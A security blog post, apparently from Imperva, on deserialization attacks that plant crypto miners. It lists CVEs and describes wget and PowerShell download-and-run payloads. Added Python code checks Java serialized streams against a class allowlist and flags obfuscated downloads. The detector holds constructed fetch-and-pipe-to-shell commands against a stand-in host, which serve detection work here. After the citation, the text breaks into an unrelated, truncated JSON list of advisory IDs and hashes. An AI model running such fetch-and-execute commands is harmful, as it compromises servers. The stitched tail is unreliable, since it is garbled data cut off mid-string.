Imperva’s research group is constantly monitoring new web application vulnerabilities. In doing so, we’ve noticed at least four major insecure deserialization vulnerabilities that were published in the past year.
Our analysis shows that, in the past three months, the number of deserialization attacks has grown by 300 percent on average, turning them into a serious security risk to web applications.
To make things worse, many of these attacks are now launched with the intent of installing crypto-mining malware on vulnerable web servers, which gridlocks their CPU usage.
In this blog post we will explain what insecure deserialization vulnerabilities are, show the growing trend of attacks exploiting these vulnerabilities and explain what attackers do to exploit them (including real-life attack examples).
## What Is Serialization?
The process of serialization converts a “live” object (structure and/or state), like a Java object, into a format that can be sent over the network, or stored in memory or on disk. Deserialization converts the format back into a “live” object.
The purpose of serialization is to preserve an object, meaning that the object will exist outside the lifetime of the local machine on which it is created.
For example, when withdrawing money from an ATM, the information of the account holder and the required operation is stored in a local object. Before this object is sent to the main server, it is serialized in order to perform and approve the needed operations. The server then deserializes the object to complete the operation.
## Types of Serialization
There are many types of [serialization](<https://en.wikipedia.org/wiki/Serialization#Serialization_formats>) available, depending on the object being serialized and on the purpose. Almost all modern programming languages support serialization. In Java, for example, an object is converted into a compact representation as a byte stream, and the byte stream can then be converted back into a copy of that object.
Other types of serialization include converting an object into a hierarchical format like JSON or XML. The advantage of this serialization is that the serialized objects can be read as plain text, instead of a byte stream.
## Deserialization Vulnerabilities from the Past Three Months
In the [OWASP top 10 security risks of 2017](<https://www.owasp.org/images/7/72/OWASP_Top_10-2017_%28en%29.pdf.pdf>), insecure deserialization came in at [eighth place](<https://www.owasp.org/index.php/Top_10-2017_A8-Insecure_Deserialization>), and rightfully so, as we argued in our [previous blog](<https://www.imperva.com/blog/2017/12/the-state-of-web-application-vulnerabilities-in-2017/>) about the state of web application vulnerabilities in 2017.
In 2017, major new vulnerabilities related to insecure serialization, mostly in Java, were published (see Figure 1).
**Name** | **Release Date (Day/Month/Year)** | **Vulnerability details**
---|---|---
CVE-2017-12149 | 01/08/2017 | Vulnerability in the JBoss Application Server allows execution of arbitrary code via crafted serialized data because the HTTP Invoker does not restrict classes for which it performs deserialization
CVE-2017-10271 | 21/06/2017 | Vulnerability in the Oracle WebLogic Server allows execution of arbitrary code due to insufficient sanitizing of user supplied inputs in the wls-wsat component
CVE-2017-9805 | 21/06/2017 | The REST Plugin in Apache Struts uses an XStreamHandler with an instance of XStream for deserialization without any type filtering, which can lead to remote code execution when deserializing XML payloads.
CVE-2017-7504 | 05/04/2017 | The HTTPServerILServlet.java in JMS allows remote attackers to execute arbitrary code via crafted serialized data because it does not restrict the classes for which it performs deserialization
_Figure 1: CVEs related to insecure deserialization_
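The Figure 1 entries for CVE-2017-12149 and CVE-2017-7504 both describe a deserializer that does not restrict the classes it accepts. As an added example (not code from the original post or from any affected product), the Python below lists the class names a Java serialized stream declares and compares them with an allowlist before the stream reaches the application. The class names, the allowlist and the `constructed_stream` helper are hypothetical, and the scanner is a heuristic over class descriptors, not a full stream parser.

```python
import base64
import re
import struct
from typing import List, Optional, Tuple

STREAM_HEADER = b"\xac\xed\x00\x05"      # STREAM_MAGIC (0xACED) + STREAM_VERSION (5)
TC_NULL, TC_CLASSDESC, TC_OBJECT, TC_ENDBLOCKDATA = 0x70, 0x72, 0x73, 0x78
SC_KNOWN_FLAGS = 0x1F                    # every SC_* flag bit the protocol defines
CLASS_NAME = re.compile(
    r"\[*(?:[BCDFIJSZ]|L?[A-Za-z_$][\w$]*(?:\.[A-Za-z_$][\w$]*)*;?)", re.ASCII)

# Hypothetical allowlist for the ATM example: the only classes the endpoint expects.
ALLOWED = frozenset({"com.example.atm.WithdrawalRequest",
                     "com.example.atm.BaseRequest"})


def unwrap(body: bytes) -> Optional[bytes]:
    """Return the raw stream if body is Java-serialized (raw or base64), else None."""
    if body.startswith(STREAM_HEADER):
        return body
    text = body.strip()
    if text.startswith(b"rO0AB"):        # base64 encoding of AC ED 00 05
        try:
            return base64.b64decode(text, validate=True)
        except ValueError:
            return None
    return None


def declared_classes(stream: bytes) -> List[str]:
    """Collect class names from TC_CLASSDESC records (heuristic byte scan)."""
    names, i = [], len(STREAM_HEADER)
    while i < len(stream) - 2:
        if stream[i] == TC_CLASSDESC:
            (n,) = struct.unpack_from(">H", stream, i + 1)
            end = i + 3 + n
            raw = stream[i + 3:end]
            # A real descriptor continues with an 8-byte serialVersionUID and a
            # flags byte that uses only the defined SC_* bits.
            if (n > 0 and len(raw) == n and end + 9 <= len(stream)
                    and (stream[end + 8] & ~SC_KNOWN_FLAGS & 0xFF) == 0):
                try:
                    name = raw.decode("ascii")
                except UnicodeDecodeError:
                    name = ""
                if CLASS_NAME.fullmatch(name):
                    names.append(name)
                    i = end + 9          # skip past UID and flags
                    continue
        i += 1
    return names


def verdict(body: bytes, allowlist=ALLOWED) -> Tuple[str, List[str]]:
    """Classify a request body: not serialized, allowed, or blocked with reasons."""
    stream = unwrap(body)
    if stream is None:
        return ("not-java-serialized", [])
    unexpected = [c for c in declared_classes(stream) if c not in allowlist]
    return ("block", unexpected) if unexpected else ("allow", [])


def constructed_stream(*class_chain: str) -> bytes:
    """Constructed sample: one field-less object whose class hierarchy is class_chain."""
    out = STREAM_HEADER + bytes([TC_OBJECT])
    for name in class_chain:
        raw = name.encode("ascii")
        out += bytes([TC_CLASSDESC]) + struct.pack(">H", len(raw)) + raw
        out += struct.pack(">q", 1)      # serialVersionUID (constructed value)
        out += b"\x02"                   # SC_SERIALIZABLE
        out += b"\x00\x00"               # zero fields
        out += bytes([TC_ENDBLOCKDATA])  # end of class annotations
    return out + bytes([TC_NULL])        # no further superclass


if __name__ == "__main__":
    expected = constructed_stream("com.example.atm.WithdrawalRequest",
                                  "com.example.atm.BaseRequest")
    unexpected = constructed_stream("com.example.unexpected.Gadget")
    for label, body in [("expected", expected),
                        ("unexpected", unexpected),
                        ("unexpected, base64", base64.b64encode(unexpected)),
                        ("json", b'{"account": "constructed"}')]:
        print(label, verdict(body))
```

Inside the JVM, the same allowlist idea is enforced at deserialization time with `java.io.ObjectInputFilter`.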
In order to understand the magnitude of these vulnerabilities, we analyzed attacks from the past three months (October to December of 2017) that try to exploit insecure deserialization. A key observation is the _steep_ increase of deserialization attacks in the past few months, as can be seen in Figure 2.
_Figure 2: Insecure deserialization attacks over the course of three months_
Most of the attackers used no attack vectors other than insecure deserialization. We noticed that each attacker was trying to exploit different vulnerabilities, with the above-mentioned CVEs being the most prevalent.
For a full list of CVEs related to insecure deserialization from the past few years see Figure 3.
**Name** | **Relevant System** | **Public Exploit** | **Name** | **Relevant System** | **Public Exploit**
---|---|---|---|---|---
CVE-2017-9844 | SAP NetWeaver | Yes | CVE-2016-2170 | Apache OFBiz | No
CVE-2017-9830 | Code42 CrashPlan | No | CVE-2016-2003 | HP P9000, XP7 Command View Advanced Edition (CVAE) Suite | No
CVE-2017-9805 | Apache Struts | Yes | CVE-2016-2000 | HP Asset Manager | No
CVE-2017-7504 | Red Hat JBoss | Yes | CVE-2016-1999 | HP Release Control | No
CVE-2017-5878 | Apache OpenMeetings | Yes | CVE-2016-1998 | HP Service Manager | No
CVE-2017-5645 | Apache Log4j | No | CVE-2016-1997 | HP Operations Orchestration | No
CVE-2017-5641 | Apache BlazeDS | Yes | CVE-2016-1986 | HP Continuous Delivery Automation | No
CVE-2017-5586 | OpenText Documentum D2 | Yes | CVE-2016-1985 | HP Operations Manager | No
CVE-2017-3159 | Apache Camel | Yes | CVE-2016-1487 | Lexmark Markvision Enterprise | No
CVE-2017-3066 | Adobe ColdFusion | Yes | CVE-2016-1291 | Cisco Prime Infrastructure | Yes
CVE-2017-2608 | Jenkins | Yes | CVE-2016-0958 | Adobe Experience Manager | No
CVE-2017-12149 | Red Hat JBoss | Yes | CVE-2016-0788 | Jenkins | Yes
CVE-2017-11284 | Adobe ColdFusion | No | CVE-2016-0779 | Apache TomEE | No
CVE-2017-11283 | Adobe ColdFusion | No | CVE-2016-0714 | Apache Tomcat | No
CVE-2017-1000353 | CloudBees Jenkins | Yes | CVE-2015-8765 | McAfee ePolicy Orchestrator | No
CVE-2016-9606 | Resteasy | Yes | CVE-2015-8581 | Apache TomEE | No
CVE-2016-9299 | Jenkins | Yes | CVE-2015-8545 | NetApp | No
CVE-2016-8749 | Jackson (JSON) | Yes | CVE-2015-8360 | Atlassian Bamboo | No
CVE-2016-8744 | Apache Brooklyn | Yes | CVE-2015-8238 | Unify OpenScape | No
CVE-2016-8735 | Apache Tomcat JMX | Yes | CVE-2015-8237 | Unify OpenScape | No
CVE-2016-7462 | VMWare vRealize Operations | No | CVE-2015-8103 | Jenkins | Yes
CVE-2016-6809 | Apache Tika | No | CVE-2015-7501 | Red Hat JBoss | Yes
CVE-2016-5229 | Atlassian Bamboo | Yes | CVE-2015-7501 | Oracle Application Testing Suite | No
CVE-2016-5004 | Apache Archiva | Yes | CVE-2015-7450 | IBM Websphere | Yes
CVE-2016-4385 | HP Network Automation | No | CVE-2015-7253 | Commvault Edge Server | Yes
CVE-2016-4372 | HP iMC | No | CVE-2015-6934 | VMWare vCenter/vRealize | No
CVE-2016-3642 | Solarwinds Virtualization Manager | Yes | CVE-2015-6576 | Atlassian Bamboo | No
CVE-2016-3461 | Oracle MySQL Enterprise Monitor | Yes | CVE-2015-6555 | Symantec Endpoint Protection Manager | Yes
CVE-2016-3427 | JMX | Yes | CVE-2015-6420 | Cisco (various frameworks) | No
CVE-2016-3415 | Zimbra Collaboration | No | CVE-2015-5348 | Apache Camel | No
CVE-2016-2510 | Red Hat JBoss BPM Suite | No | CVE-2015-5254 | Apache ActiveMQ | No
CVE-2016-2173 | Spring AMQP | No | CVE-2015-4852 | Oracle WebLogic | Yes
CVE-2016-2170 | Apache OFBiz | No | CVE-2015-3253 | Jenkins | Yes
CVE-2016-2003 | HP P9000, XP7 Command View Advanced Edition (CVAE) Suite | No | CVE-2012-4858 | IBM Cognos BI | No
_Figure 3: CVEs related to insecure deserialization_
## Deserialization Attacks in the Wild
Most of the attacks that we saw are related to byte-stream serialization of Java objects. We also saw some attacks related to serialization to XML and other formats (see Figure 4).
_Figure 4: Distribution of vulnerabilities over different serialization formats_
In the following attack (see Figure 5) the attacker is trying to exploit CVE-2017-10271. The payload is sent in the HTTP request’s body as a serialized Java object in an XML representation.
[](<https://www.imperva.com/blog/wp-content/uploads/2018/01/Attack-vector-containing-serialized-java-array-into-XML-fig-5.png>)
_Figure 5: Attack vector containing a serialized Java array in XML_
The fact that this is a Java array can be seen by the hierarchical structure of the parameters, with the suffix of **“java/void/array/void/string”**. The attacker is trying to run a bash script on the attacked server.
This bash script tries to send an HTTP request using the “wget” OS command, download a shell script disguised as a picture file (note the jpg file extension) and run it. A few interesting observations can be made when examining this command:
  * The presence of shell and “wget” commands indicates that this payload is targeting Linux systems
  * Using a picture file extension is usually done to evade security controls
  * The **“-q”** parameter to “wget” stands for “quiet”, which means that “wget” produces no output on the console, so it is harder to notice that such a request was even made.

Once the downloaded script runs, the server is infected with crypto-mining malware that tries to mine Monero digital coins (a cryptocurrency similar to Bitcoin).
The next script (see Figure 6) tries to exploit the same vulnerability, but this time the payload targets Windows servers, using cmd.exe and PowerShell commands to download the malware and run it.
[](<https://www.imperva.com/blog/wp-content/uploads/2018/01/Attack-vector-infect-Windows-server-with-crypto-mining-malware-fig-6.png>)
_Figure 6: Attack vector trying to infect Windows server with crypto mining malware_
This indicates that there are two different infection methods for Windows and Linux servers, each system with its designated script.
Another example is the following payload (Figure 7) that we pulled from an attack trying to exploit a [deserialization vulnerability](<http://seclists.org/oss-sec/2016/q1/461>) with a Java serialized object.
[](<https://www.imperva.com/blog/wp-content/uploads/2018/01/Attack-vector-containing-java-serialized-object.jpg>)
_Figure 7: Attack vector containing a Java serialized object trying to download a crypto miner_
The “bad” encoding is an artifact of Java serialization, where the object is represented in the byte stream.
Still, the script is visible in plain text (marked in yellow). The image below shows a variable that defines an internal field separator; in this case it simply stands for a space. The variable is probably used in place of a literal space to make the payload harder to detect.
[](<https://www.imperva.com/blog/wp-content/uploads/2018/01/insert-into-paragraph.jpg>)
Just as in the previous examples, this Bash script targets Linux servers and sends an HTTP request using “wget” to download a crypto miner.
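As an added example (not taken from the original post), the following Python checks command strings recovered from request payloads for the traits described in this section: the quiet “wget”, the picture extension on a file that is handed to a shell, and the field-separator variable standing in for spaces. The sample commands, the `example.invalid` host names, the indicator labels and the `naive_rule` baseline are constructed for illustration.

```python
import re

IFS_VAR = re.compile(r"\$\{IFS\}|\$IFS\b")          # shell field-separator variable
IMAGE_EXT = re.compile(r"\.(?:jpe?g|png|gif)$", re.I)
QUIET_SHORT_OPT = re.compile(r"-[A-Za-z]*q[A-Za-z]*-?")  # -q, or bundled as in -qO-
FETCHERS = {"wget", "curl"}
SHELLS = {"sh", "bash"}

# Constructed samples; example.invalid is a reserved, non-resolving name.
PLAIN = "wget -q http://files.example.invalid/logo.jpg -O - | sh"
OBFUSCATED = ("wget${IFS}-q${IFS}http://files.example.invalid/logo.jpg"
              "${IFS}-O-|sh")
BENIGN = "wget https://downloads.example.invalid/release.tar.gz"


def naive_rule(cmd: str) -> bool:
    """Baseline signature that expects a literal space between wget and -q."""
    return re.search(r"\bwget\s+-q\b", cmd) is not None


def normalize(cmd: str) -> str:
    """Expand the field-separator variable to a space before tokenising."""
    return IFS_VAR.sub(" ", cmd)


def _segments(cmd: str):
    """Split a command line on |, ; and & into token lists, one per command."""
    return [seg.split() for seg in re.split(r"[|;&]+", cmd) if seg.strip()]


def indicators(cmd: str) -> set:
    """Return the set of traits from the article that this command shows."""
    found = set()
    if IFS_VAR.search(cmd):
        found.add("ifs-as-space")
    fetched_image = ran_shell = False
    for tokens in _segments(normalize(cmd)):
        tool = tokens[0].rsplit("/", 1)[-1]          # drop any path prefix
        args = tokens[1:]
        if tool in FETCHERS:
            if tool == "wget" and any(
                    a == "--quiet" or QUIET_SHORT_OPT.fullmatch(a) for a in args):
                found.add("quiet-download")
            # URL whose path ends in a picture extension (query string ignored)
            if any(IMAGE_EXT.search(a.split("?", 1)[0])
                   for a in args if "://" in a):
                fetched_image = True
        elif tool in SHELLS:
            ran_shell = True
    # A "picture" that is downloaded and then given to a shell is not a picture.
    if fetched_image and ran_shell:
        found.add("image-extension-run-as-script")
    return found


if __name__ == "__main__":
    for sample in (PLAIN, OBFUSCATED, BENIGN):
        print(naive_rule(sample), sorted(indicators(sample)), sample)
```

The literal-space signature matches the plain sample but not the obfuscated one, while the normalising check reports the same download traits for both and adds the obfuscation itself as a signal.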
## Beyond Insecure Deserialization
The common denominator of the attacks above is that attackers are trying to infect the server with crypto-mining malware by using an insecure deserialization vulnerability. However, insecure deserialization is not the only method to achieve this goal.
Below (Figure 8) we see an example of another attack payload, this time at the “Content-Type” header.
[](<https://www.imperva.com/blog/wp-content/uploads/2018/01/Attack-vector-using-RCE-vulnerability-of-Apache-Struts-fig-8.jpg>)
_Figure 8: Attack vector using an RCE vulnerability of Apache Struts_
This attack tries to exploit **CVE-2017-5638**, a well-known RCE vulnerability related to Apache Struts which was published in March 2017 and was covered in a [previous blog post](<https://www.imperva.com/blog/2017/03/cve-2017-5638-new-remote-code-execution-rce-vulnerability-in-apache-struts-2/>).
When it was originally published we saw no indications of crypto miners in the attacks’ payloads related to this CVE, and most of the payloads were reconnaissance attacks.
However, in this attack the payload (marked in yellow above) is very similar to the payload from the previous example. Using the same remote server and the exact same script, it infected the server with crypto mining malware.
This old attack method with a new payload suggests a new trend in the cyber arena – attackers try to exploit RCE vulnerabilities, new and old, to turn vulnerable servers into crypto miners and get a faster ROI for their “effort”.
## Recommendations
Given the many new vulnerabilities related to insecure deserialization that were discovered this year, and its appearance in the OWASP top 10 security risks, we expect to see newer related vulnerabilities released in 2018. In the meantime, organizations using affected servers are advised to apply the latest patch to mitigate these vulnerabilities.
An alternative to manual patching is virtual patching. Virtual patching actively protects web applications from attacks, reducing the window of exposure and decreasing the cost of emergency patches and fix cycles.
A WAF that provides virtual patching doesn’t interfere with the normal application workflow, and keeps the site protected while allowing the site owners to control the patching process timeline.
Learn more about how to protect your web applications from vulnerabilities with [Imperva WAF solutions](<https://www.imperva.com/products/application-security/web-application-firewall-waf/>).
_Source: “Deserialization Attacks Surge Motivated by Illegal Crypto-mining”, Nadav Avital, Imperva blog, modified 2018-01-24 (<https://www.imperva.com/blog/2018/01/deserialization-attacks-surge-motivated-by-illegal-crypto-mining/>)_
"hackerone", "idList": ["H1:208566", "H1:221294", "H1:576887"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170316-01-STRUTS2"]}, {"type": "ibm", "idList": ["031AAD2F4A8A9C4530B608777F7DDA3A6A4ABAEC1F0C0C1398E073B1E0501315", "06457DA2FE08EC56407EF05C2EAAA9080634D44807C2A8ABBDEA18DCD9364BAC", "07DBE9517A4611E5419E1606D2F71A8201613E4042A34EE495FE116635651800", "0A188938BB57625255598B9B581375E3C99A86BB3F15E48ED8315B0895EAF89D", "0C0CCA72486D24634C199E09AA3461D9A894E25EB43C3E1735E0C1DEC7D01678", "0C4F91C9AA7E146EDA1AA877B92C4C590E445AC7D2AC0E60ECCE4BA77A47F0EB", "0C789A293EDA416139FC93A0F98B711533975F4FF301F513B32B4DA1FA748C6A", "0CE9B36358C9687E7112577EA1304074A68EA6DD5359A3F6615F7BA94A6B8E7D", "0D0755F0269505405CB64BD65BD409DF7890B56244501D37813BE723F406D6C1", "105120949BC0CCA8DE1379F674E81CE40B9C51F2D99DA4E967FBCAA179E0FFEA", "13C3D53BA54035028BA8B6CCC92D57C0C0AFB5754F2A746073C2E64512AF302A", "14D6BD9FB21D986F7A7372B530E1023CD0FF42323E4743E166603718FA4482AC", "1589B4745F310D5E19839D029CFF7AA2E7CE499911AB5E7A7A0995F367A8F990", "16851167A6E7D383CF52D5B447DED7E09886CA93B8A9A92A25FD7998659A49D8", "1696E1D8792540E46785AF5C86F8AD0F77D5F716A56F15223E99344280FB380A", "182B7E2B619361F12F4ED5FC874487EFED77E355247E741885559BD37BCBA877", "1BFF63EB8AF39056E08427B06D34E43B32E43FBCC74FB2A85F32E708984FD60F", "265C7F39696063EC6C052A835129BE2250A30FFCD1A9F5A46A6025E12F1AEC5A", "2AD55644A16B08DC4CD7D5B0074C944128455FA5FB38A6CCCF95596E90E15198", "2E9BC1AFBA9F34E20E313BA5B8B5B6C1AEEC0E8F6EC0B353125AA17460789A62", "2F5E9F58C5211E4D42487F7A140F36650CEBDEBD701BADBE4FFD04B577E43B91", "300B30B77E64A29C8B399F8C62E9F501F6C76F9367F47CB2AECB5124ADBB7048", "305CFF54D1B74278AA889780BABE7E0790314E9D321B6262C0EA59170C7721E6", "30B97F976830F38EC78A601AC4AF08E5E915E3601910C6A37C3824A2F36E31B8", "342276C20A5C5FDDDF8726F4B0773A53244224965A0AE1BE83CE2A30F753D938", "3484930B9D1D577B443F9B6823E8F4CFC7578B80B89E16866C07AC9046A0F330", "38EA893B1CB49114E3D8196A772DD2EACB1D68746AC3215F7DC912F30D4B3635", 
"391849D137C8AE4FB53B4FC5E1B3F8D0BCDD416F030E276A01FE226C2BE1B6BA", "3C13E1626546AB19B54BC13C855DB4A4A72EDBD9013028CD74215F23DDA82984", "3D8B3E5AED8F71EEDEBD1FA1200BCA1ACD2E6E31D2F51811AA482BFACE6985B6", "3EF919878669EE41DD08409B9AA0E2DAA0F0DBC40CFE18712D5924A93F1806CF", "3FDC0101985ADD7D5774F255D78C573813EE11684088944BAF72283AB319514E", "411DE209066A00259E38D292C22264C2EDA3B961B523920D589433F42FB534BC", "418A4C8D1E8F2E8A923DFE2C36570B4A5EF7B515E050C0F19513AF3DAE7D2628", "41A2B080355DFAE7EADFECB4D5D6C7105784D83B969140D731128E3E9EDA0757", "435516AF6D5C3AA4A41E050752C520D87248D73515C5F8742AB46F7FEAE2E9A4", "4429AE393D14D9DD1BA1A49D42CB67BB5D731909307AF189B937C047DFFB1943", "44D4BE9C6B3A5CA2D7E393A0C6B1DE6752C9B6BDF8F6BC23CA690D4063D3152B", "45B8083C191232F81D36077A9DB997569CBCDF51915A12038301F1630F4EE215", "46FE088816BBFEE72216A2D1696268656632FBC221AF416D29C97A319ABF449D", "471FC6DCFC7216154A057D59B759EF42BEB095C5F6F09974870FD1E5968AC39A", "4B658A4E1DD9BEBA4FC01E63048598E09F50CB1F3DF1425149B30054D8A86861", "4E95B5EB959CBE5490B90287812FD445A690A3158E83D37882EADCE4A7BCD44F", "51AB1F7F50AE2546674F97D246115890E30F6672B86D6D523810D29C5BAE0D62", "5281637484F76A0F64AF63C7B85C8EF529B52AD9676E8EABE3AB850E14B04D98", "52BCF84201CEBA012FEF5D806CBEB019BE40DA44E167DE103878B677EE8CAFAB", "5AC842C76A38BA7E6961E8ACD0BA85FA50688DCA05B04D73F870154778C0B550", "5E2AFDF7AB3E087F15E11D8D08AEEF34592E638BA469F3697192CBD365B9C998", "5E90705663750F9AAC65B53F188110D6CF86356EBD6A0890270ADE925BFCD638", "5F7C53205F3C1DF73818472F4A9E6151FAF5B6BEA01F0D749018E0315B401DAE", "63348F566FADDD53F743F6728812719200000602FE07DC239E5916DE25B8BFFE", "6470A30C25E8E98A770393E4946FDE7CFE3362A1DD3B87E75F8DB1F7CE3E88A5", "65DB2DF1E5DFCD77CCBBB618503600B226ECB723619232D76182A80D58890F9D", "689070AB4C011A979BBA5848242A400944D849D04225B611EB1D2B6DEFE03427", "6C099EB2D7A6A7FB08F677C5022E99A80942C8B6F6F4DD59D6C967A34499E8CB", "6D6FD3B17FF4E3AEC7C3300A59DF811D1AEFB71253A1B03A9B6D6569C666112F", 
"6D942CB417D4204D06F0CBF19552CC6688E172640D20E82701FCFAE84C9D5423", "6E10F95EC3209DC93A3215EDD3E09828D356327BBCFCB364CB9408C9804A6F8E", "6F9B3E5D97FDBB41059AA8C4DDC3F8C6E337642756FF537C16A61C7599D523B9", "7046138B9599A1C4F494C484A9BB676F47CE5DB50FD7EC9400CB6F191317A8B0", "705280D237DEDB26D3D68396BC2097819ADC8127D93D08AF8CFC027E9A703179", "70637707AD35FFD7CA24C460E8B9C97FF5600A40305CB32EDECFB2C1C9A98F05", "709E27E3685930B945F2FBC357A30EA55914B7F6AA51DED371226AB763C07085", "7196C8D1335ADFCDC76659DB37704C37F43BFC5EAAC5070B6B965CB49E2ED826", "75C8D2E2467315AEBB99E354E2DB2EE058EBC8CD1C3ACE162A19DF807E6B2876", "789948D6E2D3214CF6D14873F1BE91C91BC7007F1ACE3F9DD9D9CBFBB98592A9", "7996A5B21090888A5E92985E9AA52C1DFFD5B468A73A1B32557A0A11DFBE0724", "79F48BEE0E5A2E069BD89DB00CEE2085DF9E0E6BE97901C5D6431550085B5EE6", "7AE79CBB38C9B30F603A5F44A9B8F142162D6B14888148AC3503AD993B81C776", "7AE8462B1ED6BC7CB18D0E602A33B224072317EEACEC3938F0976678B0C95AD4", "7E0744D5936EDC5F018B0850D801B665D388060D6A81B986BC7AD81C9A78C0EE", "7E0CCCCB457D8A77AB9E189B336C99165EE3DEBFD72C3969F0C1103ED1D1CC6D", "7E1AD56C932EE6022D560B647F3D701B90E917C8D245F2619F30EAFAE93014A2", "84ADA1A0F9193EF446D20A2AE6CBA8AD78BD934525DE84341357005D9E20113E", "8539DE7456A757926C37A62C64709FF860DF8937A7CC31706F5AC8F487B2536C", "858C7CB29A95643000EADA0C1DB3FB5D46EEA8B81788EBA2B778EE7CBE075776", "872BD873063FFAF2EF7288B9566A9CA58451B802A0465ADE67F67B5E43921382", "88059994BDF023078EC1A0894C156708EBE6348CEBD9AE468DB229EA67B1E1FA", "8A242C548ADF3E615FE6BA32C7E6F5B2DB8B1FA250ABF2329DC20A0FB32D3700", "8A58A1DA760D7C9AA9496CCEB8F8DD3ECEA3B210C20F1C397D073382709059F3", "8A9198697F8388FC75E2DA73A2811AC8903D8787718F479A630B9674D8C0DC03", "8B09C9492941B8B6C6FB844862484437C6E439C77EC2B6E2EA1BC5C87B890DBB", "8B5016D64A8BBF10B52DDF15458908578A8F9418D5076DA06FD0081F472F9FAA", "8CF3082A44DE60C67D8DC18C23EE26D771B4A91C0A12FDF0AA3BEC56135A0739", "9A0B377B539E9EB3DEAE72601B316AC39529FEB48D77BA9C2660AD88E7DF662B", 
"9AE27752CE61B7806165EEC477048C9431337F2A610460AB42D12020D03EF964", "9C3CAFB5742400AAC9286EB9089506FEA84581BB4A12DAB6BB996F50EB47E45E", "9CD14117A91708D3923BD78C3B0E27E442D14B8976544CB69E7166B29DBCC7C9", "9D7005B758961DB83E562429E679C1FF93E8A3CBFDA5A6EEC3C6B52C734D2869", "9E20D1855575208AB10D7A37A8F732F5FB0995B4D096646EBC735EE1706B18C6", "9E3FCEB3C8DC76AD3152DBCC2EFEFAB5F229FFCEF4CF1D756D45190726CF3D0D", "A5022E2B14C6CFC69E613237E07A6681EAB204D56E5668D8588C0AE424BB40D9", "A54D5DA424A230A6C4C61FA58EB1A69719615CD1E841D07FDB1CEC9FE4659E45", "A6B089124F750729C2A5DCFDD551701AB74968E1A86A4C4BE83273F5F8E1BE38", "AAA4733E548388B933C5FBCDCA4EFEA642E359C79EA119CE1225DE33E6D4A575", "AB8332BB49251697A40C4A181070CC821286458CE2114BD526688971705EBC0B", "AC33843924B6A7415E2B5520B228A4C48ECE79D3ED971F29EAFD5A574C45E7BF", "AC54A5DAFA15D91044EA9FE6159829752BCD0E35D53719860B2A80D7AB2DBBA9", "AFAF169974B6AABF6CF7272D4406CAB1EDD15D52DAF28E97FB52D795BB07F8D1", "B0549540072FC1BB0D803052330E32E656605B46C7EDC1BE259FE2273831E00B", "B0917B9B05986D5C57AFA7D61D59DB3AC46BF8A66810DCCC331CD59E3A0CC975", "B0A606101370774E5FB3E4409A17D910B4B5997971AC7B7045727379D355B696", "B2EA2FBA4D280351FEA7F9EC1921C448D44F4D9EC613590A87A15467F7D34153", "B45ABED8BD58C33A07263A55AF5D4FCACA1D1D4D41B9076C9B3E26F4C663C536", "B4C8559B2D36E25ABE9FBA0A4F587138E22094E71DD07485714AE1D179A84333", "B5810DD31544DECD338CCD71F5C05C78B267068FE3FD01928B5545B05BEE5FA0", "B61AB1D0CA790E1ACAC9798122DF79FFCF9B8B2580CDC33E702C953B7EF6B140", "B634FF2E7FC1F3330432FBCA9743C474852276C64003951811F2A870EB1D6D85", "B6C593CFA8F4C1195B7D65B41828D25967C1BADAD2B07C2F63837A7BFA7E189E", "B8C124EE4E419DE7F41A9CB0246E9FF21300C4C9A2734EF999830B9906B65133", "B8D7C45A7B91FC54907F2A1A1E6B04BDAFBFDF653C7180AD40F4BA7A5091A75B", "B9410A108CEB6D3C9DFE0C1617FB34D181E021D243C3FB7F5DB35969D7C4CE52", "BBC19469EB9B90D82D15BF345DE6BD2F2984CAE6A5427AAEAFBF0699FD85D085", "BC89FD795C8D2727ED36F68D3C0CB562583E29BA6F46C7C0230E9FDCF5110D99", 
"C03FA5EBB009D6B1F8AADC24B78B9ABD8ADACBA78E030EBADE0D37E5B4B8531B", "C08849A00434A559EE1C5504DAE1CDDB28E9D46EDC400E95B2136AC317DFE7A3", "C2589DFBD09C40CB0ED3C14A127AD44309E3A47D40C1ABCBAA157F4307C403C7", "C3FB79ADA39B46791DCF93E4A2B6E50FE2792D0E382EF08036106CE4972770C2", "C4201BA18FD219F4998B9CD1F31247B019E4B70DABFE54578652DCDBE9377D5D", "C4A25CF6BA3F6E71753F4E3FF5296DCAEA56B938BAE00EF5CB5BBAB12BD4FE3F", "C55D668E9DAA959DD19BE97127802F50A829DCC234E975F8050767FE8AEFE217", "C5DC7E3B34A4B9A3DC0E8C0FAFE2DA531B9CD3D402160B1BD2722664BB8814ED", "C9A06C4BC1ACE55A17C7DD2D9DD98AA6FDEE59C9586CAFC2375754D88139C6F2", "CD8271F1E3A620207AA3EAC35F944E1453EFEBC4728A88B9C3D9D0DA7F511F56", "CE0E774D280D0A9EA8834062B059FA20181F271D6A07DE4FB444EC479DE07233", "CE820FD4621D83AF3E51CFD93CBDEF291F0771A4EE878E6401156E6ED47270AB", "D25FC5FB8A8B1C59AB072CD2FAFBE0E65B654246DF1F523B2F0760F380BBA57D", "D2E48469AB3A6F2B1FEAEFDF00F68B8BC2F210C7E3BBABA5556DFDE4C6DB7ECD", "D4C1C0E6A5170ECC8C7B3DFFE304FF401A904E8D9E1A70A203081EBBCDBE568F", "D5DD24C882DBB1D9A7CA1FF6A2B5E71A2110BD5524772EF5C4D134F94002AC84", "D66F1CF05D4FAEAA1D2A1BD6C942DFBCEFA7698121E07EA674D81BA77E984AF6", "D6EF0A354BC60FD9763CCD91736DAA8B1445C437C0A7B30389216581A9447D9D", "D71ECE9054A0423D2796261CBA40257762AA9E2D7719136781F2B173EA9107E9", "D807F98F285E9AA24C6982ECD7ECE986CC9DAEE3771B85EB11104E7DB3A38BAE", "D86489221457B61FCC95E41FD2271EB756D72E51AED6BEEA73DF5EA02691AB18", "D9F9C21739CE0374485FD9F451E99B1E3D3DD763F365282CE7DBE1FD581588A1", "DB2B818A328E9D978E389CD017B47DF75CF8C64900E023A2B46B5D029C47E02F", "DB866DC8DC23646847AE5E9E25C02B2DF2A195A414B2734DCAA102E637957BAF", "DDAE44367545E909F1C5E82BA6B48DEA1D51F717CEAE6CED7805AFEA883D85F1", "DE915924CF7F2670B1FFCDF6498DBB124F4087216A8B4D38EBCEE133912CE5E2", "DF1E63CF8B14528F156628BE21730C46B9AD6FEBFA9BE46C21DFFEFE8A0D3852", "E026D876441506065638E9669757F49A62954ECA499F837804AD1070CA5C7B19", "E095FC03096261FE55986EF4F402EA0A700BEE11F22BFA669379C13D2E1BC33B", 
